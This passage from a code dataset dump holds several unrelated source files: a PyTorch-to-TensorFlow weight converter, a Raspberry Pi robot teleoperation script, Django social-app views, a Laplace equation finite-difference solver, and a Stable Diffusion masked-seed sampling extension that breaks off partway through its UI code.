shape_tf == (shape_py[2], shape_py[3], shape_py[1], shape_py[0]):\n weight_tf.assign(weight_py.numpy().transpose(2, 3, 1, 0))\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}, transposed')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class DepthwiseTransposedConvolutionHandler(WeightHandler):\n \"\"\"\n Assigns source_weight to target_weight if the source_weight is a depthwise transposed convolution and\n target_weight is a regular transposed convolution.\n \"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n weight_tf, name_tf, shape_tf = PytorchToTensorflowHandlers._preprocess_tensorflow(target_weight)\n weight_py, name_py, shape_py = 
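A quick layout check for the ConvolutionHandler above: PyTorch stores 2D conv kernels as (out, in, kH, kW) while TensorFlow expects (kH, kW, in, out), hence the (2, 3, 1, 0) transpose:

import numpy as np

py_kernel = np.zeros((64, 3, 7, 7), dtype=np.float32)  # (out, in, kH, kW)
tf_kernel = py_kernel.transpose(2, 3, 1, 0)
assert tf_kernel.shape == (7, 7, 3, 64)                # (kH, kW, in, out)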
PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if len(shape_tf) == len(shape_py) == 4:\n equal_height_width = (shape_tf[:2] == shape_py[2:])\n equal_out_channels = (shape_tf[3] == shape_py[0])\n depthwise_conv_py = (shape_py[1] == 1)\n if 'conv2d_transpose' in name_tf and equal_height_width and equal_out_channels and depthwise_conv_py:\n gen_weights = np.zeros(shape_tf, dtype=np.float32)\n py_transposed = weight_py.numpy().transpose(2, 3, 1, 0)\n for ch in range(shape_tf[2]):\n gen_weights[:, :, ch, ch] = py_transposed[:, :, 0, ch]\n weight_tf.assign(tf.convert_to_tensor(gen_weights))\n\n if self.logger:\n self.logger.info(f'{name_tf} was assigned successfully from {name_py}, depthwise convolution')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=True)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n class BatchNormalizationSkipExtraHandler(WeightHandler):\n \"\"\"Skips the 'num_batches_tracked' weight from pytorch BatchNorm layers.\"\"\"\n\n def _process_weights(self, source_weight, target_weight) -> WeightHandlerReturn:\n _, name_py, _ = PytorchToTensorflowHandlers._preprocess_pytorch(source_weight)\n\n if 'num_batches_tracked' in name_py:\n if self.logger:\n self.logger.info(f'skipped {name_py}')\n return WeightHandlerReturn(processed=True, matched_source=True, matched_target=False)\n\n return WeightHandlerReturn(processed=False, matched_source=False, matched_target=False)\n\n\nclass WeightsConverter:\n \"\"\"\n Deals with conversion of the source model's weights to the target model's weights.\n Args:\n source_weights: List[Any] - the weights that need to be transferred\n target_weights: List[Any] - the weights which need to receive the transfer\n weight_handler: WeighthHandler - handles a specific weight pair conversion\n silent_fail: bool - if True, when a pair of weights could not be handled, no exception is thrown.\n \"\"\"\n\n def __init__(self, source_weights: List[Any], target_weights: List[Any], weight_handler: WeightHandler,\n silent_fail: bool = False):\n self.source_weights = source_weights\n self.target_weights = target_weights\n self.weight_handler = weight_handler\n self.silent_fail = silent_fail\n\n def do_conversion(self):\n \"\"\"Iterates over the weight lists and does the conversion.\"\"\"\n source_idx = 0\n target_idx = 0\n\n while target_idx < len(self.target_weights):\n source_weight = self.source_weights[source_idx]\n target_weight = self.target_weights[target_idx]\n handle_result = self.weight_handler(source_weight, target_weight)\n if handle_result.processed:\n source_idx += handle_result.matched_source\n target_idx += handle_result.matched_target\n else:\n if not self.silent_fail:\n raise Warning(f'{target_weight} could not be matched with {source_weight}')\n\n def __call__(self):\n self.do_conversion()\n\n\nclass DLASegConverter(WeightsConverter):\n \"\"\"Class used for loading pytorch weights in tensorflow for DLASeg.\"\"\"\n\n @staticmethod\n def get_DLASeg_weights_handler() -> WeightHandler:\n \"\"\"Returns the handler used in the conversion.\"\"\"\n handler = PytorchToTensorflowHandlers.SameShapeHandler()\n handler.then(PytorchToTensorflowHandlers.ConvolutionHandler()).then(\n PytorchToTensorflowHandlers.DepthwiseTransposedConvolutionHandler()).then(\n PytorchToTensorflowHandlers.BatchNormalizationSkipExtraHandler())\n return handler\n\n @staticmethod\n def get_weights_list_pytorch(filename: str) -> List[Tuple[str, torch.Tensor]]:\n \"\"\"Loads the .pth 
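The depthwise handler above scatters a (kH, kW, 1, C) kernel onto the channel diagonal of a full (kH, kW, C, C) kernel; the same expansion in isolation:

import numpy as np

def expand_depthwise(kernel):                 # kernel: (kH, kW, 1, C)
    kh, kw, _, c = kernel.shape
    full = np.zeros((kh, kw, c, c), dtype=kernel.dtype)
    for ch in range(c):
        full[:, :, ch, ch] = kernel[:, :, 0, ch]
    return full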
weights from the given filename, on cpu.\"\"\"\n weights = torch.load(filename, map_location=torch.device('cpu'))\n weights = weights['state_dict']\n weights = list(weights.items())\n return weights\n\n @staticmethod\n def get_weights_list_tensorflow(model: base_model.BaseModel, batch_size: int, input_height: int,\n input_width: int) -> List[tf.Variable]:\n \"\"\"Given a base_model.BaseModel model and the input shape, it constructs and returns the list with model's\n weights.\"\"\"\n img = tf.zeros((batch_size, 3, input_height, input_width), tf.float32)\n pre_img = tf.zeros_like(img)\n pre_hm = tf.zeros((batch_size, 1, input_height, input_width), tf.float32)\n model(img, pre_img, pre_hm) # construct the weights\n return model.weights\n\n @staticmethod\n def get_logger(logging_level=logging.WARNING) -> logging.Logger:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging_level)\n logger.addHandler(logging.StreamHandler())\n return logger\n\n def __init__(self, pytorch_pth_path: str, model: dla.DLASeg, batch_size: int, input_height: int, input_width: int):\n \"\"\"\n Args:\n pytorch_pth_path: str - path to .pth file holding pytorch weights (result of a .state_dict() call)\n model: dla.DLASeg - tensorflow model instance\n batch_size, input_height, input_width: int - input characteristics for the tensorflow model\n \"\"\"\n pytorch_weights = self.get_weights_list_pytorch(pytorch_pth_path)\n tensorflow_weights = self.get_weights_list_tensorflow(model, batch_size, input_height, input_width)\n handler = self.get_DLASeg_weights_handler()\n handler.set_chain_logger(self.get_logger(logging.INFO))\n super().__init__(source_weights=pytorch_weights, target_weights=tensorflow_weights, weight_handler=handler,\n silent_fail=False)\n","repo_name":"googleinterns/keypoint-mot","sub_path":"src/model/weights_converter.py","file_name":"weights_converter.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25699083242","text":"import time\nimport cv2\nimport RPi.GPIO as GPIO\n\n\ndef forward(speed = 50):\n # Right motor control\n pr.start(speed)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.HIGH)\n # Left motor control\n pl.start(speed)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.HIGH)\n\ndef backward(speed = 50):\n # Right motor control\n pr.start(speed)\n GPIO.output(pinr1,GPIO.HIGH)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(speed)\n GPIO.output(pinl1,GPIO.HIGH)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef rotRight():\n # Right motor control\n pr.start(30)\n GPIO.output(pinr1,GPIO.HIGH)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(30)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.HIGH)\n\ndef rotLeft():\n # Right motor control\n pr.start(30)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.HIGH)\n # Left motor control\n pl.start(30)\n GPIO.output(pinl1,GPIO.HIGH)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef sstop():\n # Right motor control\n pr.start(0)\n GPIO.output(pinr1,GPIO.LOW)\n GPIO.output(pinr2,GPIO.LOW)\n # Left motor control\n pl.start(0)\n GPIO.output(pinl1,GPIO.LOW)\n GPIO.output(pinl2,GPIO.LOW)\n\ndef main():\n vid_cap = cv2.VideoCapture(0)\n try:\n while(vid_cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = vid_cap.read()\n if ret:\n cv2.imshow(\"frame\",frame)\n key = cv2.waitKey(1)\n # Close window when you press q\n print('key: ',key)\n \n if key & 0xFF == ord('q'):\n break\n elif key & 0xFF == 82: #ord('z')\n 
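The elif ladder in the teleop main() below maps arrow-key codes to the motion helpers defined in that record; a dict-dispatch sketch of the same mapping (same key codes, same fallback to sstop):

ACTIONS = {82: forward, 84: backward, 81: rotLeft, 83: rotRight}

def handle_key(key):
    ACTIONS.get(key & 0xFF, sstop)()   # unknown keys stop the robot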
print(\"forward\")\n forward()\n elif key & 0xFF == 84: #ord('s')\n print(\"backward\")\n backward()\n elif key & 0xFF == 81: #ord('a')\n print(\"rot left\")\n rotLeft()\n elif key & 0xFF == 83: #ord('e')\n print(\"rot right\")\n rotRight()\n else:\n print(\"stop\")\n sstop()\n else:\n break\n\n finally:\n cv2.destroyAllWindows()\n GPIO.cleanup()\n\n\nif __name__ == \"__main__\":\n # Setting pins board mode \n GPIO.setmode(GPIO.BOARD) # or GPIO.setmode(GPIO.BCM)\n\n # Disable warnings\n GPIO.setwarnings(False)\n\n # Setup channels\n pwmL = 15\n pinl1 = 13\n pinl2 = 11\n\n pwmR = 22\n pinr1 = 16\n pinr2 = 18\n\n GPIO.setup(pwmL, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinl1, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinl2, GPIO.OUT, initial=GPIO.LOW)\n\n GPIO.setup(pwmR, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinr1, GPIO.OUT, initial=GPIO.LOW)\n GPIO.setup(pinr2, GPIO.OUT, initial=GPIO.LOW)\n\n pr = GPIO.PWM(pwmR, 50) # frequency=50Hz\n pl = GPIO.PWM(pwmL, 50) # frequency=50Hz\n main()","repo_name":"MedChebbi/Educational_Rpi_Robot","sub_path":"robot/teleop_cam.py","file_name":"teleop_cam.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16616887225","text":"from django.shortcuts import render, redirect\nfrom .forms import DweetForm, CustomUserCreationForm\nfrom .models import Profile\nfrom django.urls import reverse\nfrom django.contrib.auth import login\n\n\ndef dashboard(request):\n form = DweetForm(request.POST or None)\n if request.method == \"POST\":\n if form.is_valid():\n dweet = form.save(commit=False)\n dweet.user = request.user\n dweet.save()\n return redirect(\"dwitter:dashboard\")\n return render(request, \"dwitter/dashboard.html\", {\"form\": form})\n\ndef redirect_view(request):\n response = redirect('/redirect-success/')\n return response\n\ndef profile_list(request):\n profiles = Profile.objects.exclude(user=request.user)\n return render(request, \"dwitter/profile_list.html\", {\"profiles\": profiles})\n\ndef profile(request, pk):\n if not hasattr(request.user, 'profile'):\n missing_profile = Profile(user=request.user)\n missing_profile.save()\n\n profile = Profile.objects.get(pk=pk)\n if request.method == \"POST\":\n current_user_profile = request.user.profile\n data = request.POST\n action = data.get(\"follow\")\n if action == \"follow\":\n current_user_profile.follows.add(profile)\n elif action == \"unfollow\":\n current_user_profile.follows.remove(profile)\n current_user_profile.save()\n return render(request, \"dwitter/profile.html\", {\"profile\": profile})\n\ndef register(request):\n if request.method == \"GET\":\n return render(\n request, \"dwitter/register.html\",\n {\"form\": CustomUserCreationForm}\n )\n elif request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return render(request, \"dwitter/dashboard.html\")\n","repo_name":"khalid-basha/project4-GSG-Social","sub_path":"social/dwitter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26034539556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 2 10:24:15 2019\r\n\r\n@author: Jorge Antonio Matias López\r\n\"\"\"\r\n#Programa que soluciona la ecuación de laplace mediante diferencias finitas, ejemplo del libro Numerical Analysis\r\n#capitulo 12.1 generalizado para n 
dimensiones\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom time import time\r\n\r\n####################################################################\r\n\r\ndef sumalista(listaNumeros):#suma los elementos de una lista\r\n Suma = 0\r\n for i in listaNumeros:\r\n Suma = Suma + i\r\n return Suma\r\n####################################################################\r\ndef posicion(n,i,j):#posicion en la matriz\r\n pos=(n-1)*(i-1)+j-1\r\n return pos\r\n#####################################################################\r\ndef gauss(matriz,vect,tol):#Método de Gauss-Seidel\r\n print('Gauss-Seidel')\r\n dim=matriz.shape\r\n comp=np.zeros(dim[0])\r\n itera=1000\r\n res=np.zeros(dim[0])\r\n error=[]\r\n k=0\r\n t_ini=time()\r\n while k<itera:\r\n suma=0\r\n k=k+1\r\n for ren in range(0,dim[0]):\r\n suma=0\r\n for col in range(0,dim[1]):\r\n if (col != ren):\r\n suma=suma+matriz[ren,col]*res[col] \r\n res[ren]=(vect[ren]-suma)/matriz[ren,ren]\r\n del error[:]\r\n #Comprobación\r\n for ren in range(0,dim[0]):\r\n suma=0\r\n for col in range(0,dim[1]):\r\n suma=suma+matriz[ren,col]*res[col] \r\n comp[ren]=suma\r\n dif=abs(comp[ren]-vect[ren])\r\n \r\n error.append(dif)\r\n\r\n #print('Iteracion',k)\r\n if all( i<=tol for i in error) == True:\r\n break\r\n t_fin=time()\r\n t_ejecucion=round(t_fin-t_ini,10)\r\n print(res)\r\n print('El tiempo de ejecución Gauss-Seidel es '+str(t_ejecucion)+' segundos')\r\n return(res)\r\n############################################################################### \r\ndef gauss_crs(matriz,vector,tol):#Gauss-seidel con CRS\r\n print('CRS Gauss-Seidel')\r\n x,y=matriz.shape\r\n val=[]\r\n col_ind=[]\r\n ren_elem=[]\r\n di=[]\r\n cont=0\r\n for i in range(x):\r\n ren_elem.append(cont)\r\n for j in range(y):\r\n if i!=j:\r\n if matriz[i,j]!=0:\r\n val.append(matriz[i,j])\r\n col_ind.append(j)\r\n cont=cont+1\r\n else:\r\n di.append(matriz[i,j])\r\n \r\n valor=np.array(val)\r\n col=np.array(col_ind)\r\n ren=np.array(ren_elem)\r\n diag=np.array(di)\r\n #return(valor,col,ren,diag) \r\n ##GaussSeidel \r\n maxitera=1000\r\n res=np.zeros(x)\r\n exa=np.linalg.solve(matriz,vector)\r\n error=[]\r\n k=0\r\n t_ini=time()\r\n while k<maxitera:\r\n suma=0\r\n k=k+1\r\n for i in range(0,ren.size):\r\n suma=0\r\n if i != ren.size-1:\r\n for j in range(ren[i],ren[i+1]):\r\n suma=suma+valor[j]*res[col[j]] \r\n \r\n res[i]=(vector[i]-suma)/diag[i]\r\n else:\r\n for j in range(ren[i],valor.size):\r\n suma=suma+valor[j]*res[col[j]] \r\n res[i]=(vector[i]-suma)/diag[i]\r\n \r\n del error[:]\r\n \r\n \r\n #Comprobación\r\n for i in range(0,res.size):\r\n dif=abs(exa[i]-res[i])\r\n error.append(dif)\r\n if all( i<=tol for i in error) == True:\r\n break\r\n t_fin=time()\r\n t_ejecucion=round(t_fin-t_ini,10)\r\n #print(res)\r\n print('El tiempo de ejecución CRS_gauss es '+str(t_ejecucion)+' segundos')\r\n return res\r\n################################################################################\r\ndef matbld():#construccion de la matriz cuadrada de tamaño n y el vector de constantes\r\n const=[]#vector de constantes\r\n mat=[]#renglón de la matriz(se anexa un renglón en cada ciclo)\r\n for k in range(0,(n-1)**2):#llena el renglón auxiliar con ceros\r\n mat.append(0)\r\n pos=posicion(n,i,j)\r\n mat[pos]=4\r\n #condiciones de frontera\r\n if j-1>0:\r\n mat[posicion(n,i,j-1)]=-1\r\n else:\r\n const.append(0)\r\n if j+1<n:\r\n mat[posicion(n,i,j+1)]=-1\r\n else:\r\n const.append((n-i)*grad)\r\n if i-1>0:\r\n mat[posicion(n,i-1,j)]=-1\r\n else:\r\n 
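matbld above assembles the dense (n-1)^2 x (n-1)^2 system for the 5-point Laplacian; for comparison, a sketch that iterates the stencil directly on the grid (Jacobi sweeps), with boundary values held on the array border:

import numpy as np

def jacobi_laplace(u, tol=1e-8, max_iter=10000):
    for _ in range(max_iter):
        nuevo = u.copy()
        nuevo[1:-1, 1:-1] = 0.25 * (u[:-2, 1:-1] + u[2:, 1:-1] +
                                    u[1:-1, :-2] + u[1:-1, 2:])
        if np.max(np.abs(nuevo - u)) < tol:
            return nuevo
        u = nuevo
    return u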
const.append(j*grad)\r\n if i+1<n:\r\n mat[posicion(n,i+1,j)]=-1\r\n else:\r\n const.append(0)\r\n \r\n matriz.append(mat)#agregla el renglón creado a la matriz principal\r\n #agrega la suma de los coeficientes en las fronteras al vector de coeficientes\r\n vector.append(sumalista(const))\r\n return()\r\n##########################################################################################################\r\ndef solexa(n,i,j):#solucion exacta\r\n x=(j+1)*dx\r\n y=(n-i-1)*dy\r\n exa=abs(400*x*y)\r\n '''print('x','y','Solución exacta')\r\n print(x,y,exa)'''\r\n return(exa)\r\n##########################################################################################################\r\ndef error(exa,cal,n):\r\n err=np.zeros([(n-1),(n-1)])\r\n for i in range(n-1):\r\n for j in range(n-1):\r\n err[i,j]=abs(exa[i,j]-cal[i,j])#error\r\n err[i,j]=err[i,j]**2\r\n error=math.sqrt(np.sum(err))\r\n \r\n return(error)\r\n###########################################################################################################\r\n###########################################################################################################\r\n#### Inicio ###\r\ne=[]\r\ntam=[]\r\nfor k in range(4,17,2):\r\n matriz=[]\r\n vector=[]\r\n mx=100#condición de frontera (valor máximo) \r\n n=k\r\n print('n='+str(n))\r\n tol=0.00000001\r\n grad=mx/n\r\n #Tamaño del dominio\r\n lx=0.5\r\n ly=0.5\r\n\r\n dx=lx/n\r\n dy=ly/n\r\n for i in range(1,n):\r\n for j in range(1,n):\r\n matbld()\r\n \r\n mat=np.array(matriz)\r\n vec=np.array(vector)\r\n #soluciones por diferentes metodos\r\n solucion=np.linalg.solve(mat,vec)#solución del sistema de ecuaciones linalg python\r\n #sol_gauss=gauss(mat,vec,tol)#solucion Gauss-Seidel\r\n# solucion=gauss_crs(mat,vec,tol)#solucion Gauss-Seidel matriz CRS\r\n\r\n solcal=np.zeros([(n-1),(n-1)])\r\n sol=np.zeros([(n-1),(n-1)])\r\n\r\n solex=np.zeros([(n-1),(n-1)])\r\n\r\n\r\n \r\n for i in range(n-1):\r\n for j in range(n-1):\r\n \r\n solex[i,j]=solexa(n,i,j)#matriz solución exacta\r\n solcal[i,j]=solucion[(i*(n-1))+j]#matriz solucion calculada\r\n sol[i,j]=round(solucion[(i*(n-1))+j],2)#matriz solución calculada\r\n \r\n\r\n \r\n errorN2=error(solex,solcal,n)\r\n\r\n# e.append(errorN2)\r\n# tam.append(n)\r\n \r\n e.append(math.log10(errorN2))\r\n tam.append(math.log10(n))\r\n \r\n# e.append(-math.log10(errorN2))\r\n# tam.append(math.log10(n))\r\n X=np.array(tam)\r\n Y=np.array(e)\r\n#razón de convergencia\r\nfig,ax0=plt.subplots()\r\nax0.plot(X,Y)\r\nax0.grid()\r\nax0.set(xlabel='tamaño', ylabel='Error',\r\n title='Razón de convergencia -log-log')\r\n\r\n#graficas\r\n'''fig, ax = plt.subplots()#Solo genera una grafica\r\nim = ax.imshow(sol)\r\nfor i in range(sol.shape[0]):\r\n for j in range(sol.shape[0]):\r\n text = ax.text(j, i, sol[i, j],ha=\"center\",\r\n va=\"center\", color=\"w\")\r\nax.set_title(\"Solución °C\")\r\ncbar = fig.colorbar(im)\r\nfig.tight_layout()'''\r\nplt.show","repo_name":"matdelaterra/Desarrollos","sub_path":"DifFinCalor.py","file_name":"DifFinCalor.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5775062804","text":"from __future__ import annotations\nfrom collections import defaultdict\nimport os\nimport re\nimport traceback\nimport copy\nimport gradio as gr\nimport modules.images as images\nimport modules.scripts as scripts\nimport torch\nimport numpy as np\nfrom ldm.modules.encoders.modules import FrozenCLIPEmbedder, FrozenOpenCLIPEmbedder\nimport 
open_clip.tokenizer\nfrom modules import script_callbacks\nfrom modules import script_callbacks, sd_hijack_clip, sd_hijack_open_clip\nfrom modules.processing import (Processed, StableDiffusionProcessing, fix_seed,\n process_images)\nfrom modules.shared import cmd_opts, opts, state\nimport modules.shared as shared\nfrom PIL import Image\nfrom modules.sd_samplers_kdiffusion import KDiffusionSampler\nfrom modules.sd_samplers import sample_to_image\norig_callback_state = KDiffusionSampler.callback_state\nimport modules.processing\nfrom tqdm.auto import trange, tqdm\nimport k_diffusion.sampling\nfrom k_diffusion.sampling import to_d\nfrom modules import devices\nfrom modules import prompt_parser\nimport json\nfrom modules.ui_components import FormRow\nimport pandas as pd\nimport random\nglobal mask\nglobal start_noise\nbefore_image_saved_handler = None\nimages_to_show = []\ndef slerp_with_mask(val, noise, subnoise):\n global mask\n global start_noise\n mask = mask.bool()\n mask[3,:,:] = mask[0,:,:]\n mask_float = torch.ones_like(noise)\n mask_float = mask_float * mask * 0.05\n start_noise = subnoise\n new_noise = mask_float * subnoise + (1 - mask_float) * noise\n low_norm = noise/torch.norm(noise, dim=1, keepdim=True)\n high_norm = new_noise/torch.norm(new_noise, dim=1, keepdim=True)\n return new_noise\n\n\ndef get_new_prompt(prompts, p):\n with devices.autocast():\n c = prompt_parser.get_multicond_learned_conditioning(shared.sd_model, [prompts], p.steps)\n return c\n\n\n# from https://discuss.pytorch.org/t/help-regarding-slerp-function-for-generative-model-sampling/32475/3\ndef slerp_no_mask(val, low, high):\n global start_noise\n global mask\n if mask.dtype != torch.bool:\n mask = mask.bool()\n if mask.ndim ==3:\n mask[3,:,:] = mask[0,:,:]\n start_noise = high\n low_norm = low/torch.norm(low, dim=1, keepdim=True)\n high_norm = high/torch.norm(high, dim=1, keepdim=True)\n dot = (low_norm*high_norm).sum(1)\n\n if dot.mean() > 0.9995:\n return low * val + high * (1 - val)\n\n omega = torch.acos(dot)\n so = torch.sin(omega)\n res = (torch.sin((1.0-val)*omega)/so).unsqueeze(1)*low + (torch.sin(val*omega)/so).unsqueeze(1) * high\n return res\n\n@torch.no_grad()\ndef sample_euler_with_mask(model, x, sigmas, extra_args=None, callback=None, disable=None, s_churn=0., s_tmin=0., s_tmax=float('inf'), s_noise=1.):\n global mask\n global seednew\n global run_denosing_different_seed\n global intermediate_step_different_seed\n global apply_intermediate_denoising\n global intermediate_step\n global new_cond\n global new_pr\n global alpha\n global new_seed_list\n\n\n \"\"\"Implements Algorithm 2 (Euler steps) from Karras et al. 
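slerp_no_mask above follows the standard spherical-interpolation formula; the bare formula without the mask bookkeeping, for reference:

import torch

def slerp(val, low, high):
    low_n = low / torch.norm(low, dim=1, keepdim=True)
    high_n = high / torch.norm(high, dim=1, keepdim=True)
    omega = torch.acos((low_n * high_n).sum(1).clamp(-1, 1))
    so = torch.sin(omega)
    return ((torch.sin((1.0 - val) * omega) / so).unsqueeze(1) * low +
            (torch.sin(val * omega) / so).unsqueeze(1) * high)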
(2022).\"\"\"\n extra_args = {} if extra_args is None else extra_args\n s_in = x.new_ones([x.shape[0]])\n for i in trange(len(sigmas) - 1, disable=disable):\n gamma = min(s_churn / (len(sigmas) - 1), 2 ** 0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.\n eps = torch.randn_like(x) * s_noise\n sigma_hat = sigmas[i] * (gamma + 1)\n if gamma > 0:\n x = x + eps * (sigma_hat ** 2 - sigmas[i] ** 2) ** 0.5\n\n if run_denosing_different_seed:\n # running denoising with a different seed\n extra_args2 = copy.deepcopy(extra_args)\n # if new_pr != '':\n # extra_args2['cond'] = new_cond\n denoised2 = model(start_noise, sigma_hat * s_in, **extra_args2)\n d2 = to_d(start_noise, sigma_hat, denoised2)\n dt2 = sigmas[i + 1] - sigma_hat\n start_noise = start_noise + d2 * dt2\n\n # combine them after certain number of iterations\n if i > intermediate_step_different_seed:\n x = mask * start_noise + mask.bitwise_not() * x\n start_noise = x\n if new_pr != '':\n extra_args['cond'] = new_cond \n \n \n denoised = model(x, sigma_hat * s_in, **extra_args)\n\n if apply_intermediate_denoising:\n previous_denoised = denoised\n for j in range(len(step_list)):\n step = int(step_list[j])\n if i == step:\n masks = prepare_mask(masks_list)\n denoinsed_masked = torch.zeros_like(denoised)\n if mask_active_list[j]:\n mask = masks_list[j]\n mask = mask.bool()\n mask[3,:,:] = mask[0,:,:]\n mask = mask.unsqueeze(0)\n masks = masks + mask\n if new_seed_list[j] == -1:\n new_seed_list[j] = int(random.randrange(4294967294))\n start_noise = devices.randn(new_seed_list[j], [4,64,64]).unsqueeze(0)\n start_noise = start_noise * sigmas[int(sigma_step_list[j])]\n denoinsed_masked += (previous_denoised + 5* alpa_list[j] * start_noise) * mask\n \n denoised = denoinsed_masked + masks.bitwise_not() * denoised\n\n \n d = to_d(x, sigma_hat, denoised)\n if callback is not None:\n callback({'x': x, 'i': i, 'sigma': sigmas[i], 'sigma_hat': sigma_hat, 'denoised': denoised})\n dt = sigmas[i + 1] - sigma_hat\n # Euler method\n x = x + d * dt\n return x\n\n@torch.no_grad()\ndef sample_euler(model, x, sigmas, extra_args=None, callback=None, disable=None, s_churn=0., s_tmin=0., s_tmax=float('inf'), s_noise=1.):\n \"\"\"Implements Algorithm 2 (Euler steps) from Karras et al. 
(2022).\"\"\"\n extra_args = {} if extra_args is None else extra_args\n s_in = x.new_ones([x.shape[0]])\n for i in trange(len(sigmas) - 1, disable=disable):\n gamma = min(s_churn / (len(sigmas) - 1), 2 ** 0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.\n eps = torch.randn_like(x) * s_noise\n sigma_hat = sigmas[i] * (gamma + 1)\n if gamma > 0:\n x = x + eps * (sigma_hat ** 2 - sigmas[i] ** 2) ** 0.5\n denoised = model(x, sigma_hat * s_in, **extra_args)\n d = to_d(x, sigma_hat, denoised)\n if callback is not None:\n callback({'x': x, 'i': i, 'sigma': sigmas[i], 'sigma_hat': sigma_hat, 'denoised': denoised})\n dt = sigmas[i + 1] - sigma_hat\n # Euler method\n x = x + d * dt\n return x\n\ndef gr_show(visible=True):\n return {\"visible\": visible, \"__type__\": \"update\"}\n\ndef prepare_masks(mask_list, active_mask_flag_list):\n masks = []\n for i in range(len(mask_list)):\n if mask_list[i] is None:\n masks.append(torch.zeros(4,64,64).cuda())\n else:\n resized_mask = mask_list[i]['mask'].resize((64,64), Image.NEAREST)\n masks.append(torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda())\n return masks\ndef create_active_masks(mask_list, active_mask_flag_list):\n masks = []\n for i in range(len(mask_list)):\n if mask_list[i] is None:\n masks.append(torch.zeros(4,64,64).cuda())\n else:\n resized_mask = mask_list[i]['mask'].resize((64,64), Image.NEAREST)\n masks.append(torch.from_numpy(np.array(resized_mask)).permute(2,0,1).cuda())\n \n active_mask = torch.zeros_like(masks[0]).cuda()\n for i in range(len(masks)):\n active_mask = active_mask + active_mask_flag_list[i] * masks[i]\n \n return active_mask\n\ndef variable_outputs(k):\n max_textboxes = 10\n k = int(k)\n return [gr.Textbox.update(visible=True)]*k + [gr.Textbox.update(visible=False)]*(max_textboxes-k)\ndef prepare_mask(masks_list):\n masks = torch.zeros_like(masks_list[0])\n masks = masks.bool()\n masks[3,:,:] = masks[0,:,:]\n masks = masks.unsqueeze(0)\n return masks\ndef variable_outputs_tab(k):\n max_textboxes = 10\n k = int(k)\n return [gr.Textbox.update(visible=True)]*k + [gr.Textbox.update(visible=False)]*(max_textboxes-k)\n\n\n\nclass Script(scripts.Script):\n \n GRID_LAYOUT_AUTO = \"Auto\"\n GRID_LAYOUT_PREVENT_EMPTY = \"Prevent Empty Spot\"\n GRID_LAYOUT_BATCH_LENGTH_AS_ROW = \"Batch Length As Row\"\n \n def title(self):\n return \"seed_mask\"\n\n def show(self, is_img2img):\n return scripts.AlwaysVisible\n\n def ui(self, is_img2img):\n \n with gr.Row():\n is_active = gr.Checkbox(\n label=\"seed_mask\",\n value=False)\n mask_intermediate = gr.Checkbox(\n label=\"mask_intermediate\",\n value=False)\n \n\n with FormRow().style(equal_height=False):\n with gr.Column(variant='compact', elem_id=\"diffusion_brush_settings\"):\n copy_image_buttons = []\n copy_image_destinations = {}\n\n def add_copy_image_controls(tab_name, elem):\n with gr.Row(variant=\"compact\", elem_id=f\"magic_brush_copy_to_{tab_name}\"):\n gr.HTML(\"Copy image to: \", elem_id=f\"magic_brush_label_copy_to_{tab_name}\")\n\n for title, name in zip(['mask1', 'mask2', 'mask3'], ['mask1', 'mask2', 'mask3']):\n if name == tab_name:\n gr.Button(title, interactive=False)\n copy_image_destinations[name] = elem\n continue\n\n button = gr.Button(title)\n copy_image_buttons.append((button, name, elem))\n mask_list = []\n mask_active_list = []\n alpa_list = []\n step_list = []\n new_seed_list = []\n sigma_step_list = []\n with gr.Tabs(elem_id=\"magic_brush\"):\n with gr.TabItem('mask1', id='mask1', elem_id=\"mask1_tab\") as tab_mask1:\n with 
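prepare_masks above downsamples each sketched mask to the 64x64 latent grid and moves channels first; the per-mask transform in isolation:

import numpy as np
import torch
from PIL import Image

def mask_to_latent(mask_img):                       # PIL RGBA image
    small = mask_img.resize((64, 64), Image.NEAREST)
    return torch.from_numpy(np.array(small)).permute(2, 0, 1)  # (4, 64, 64)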
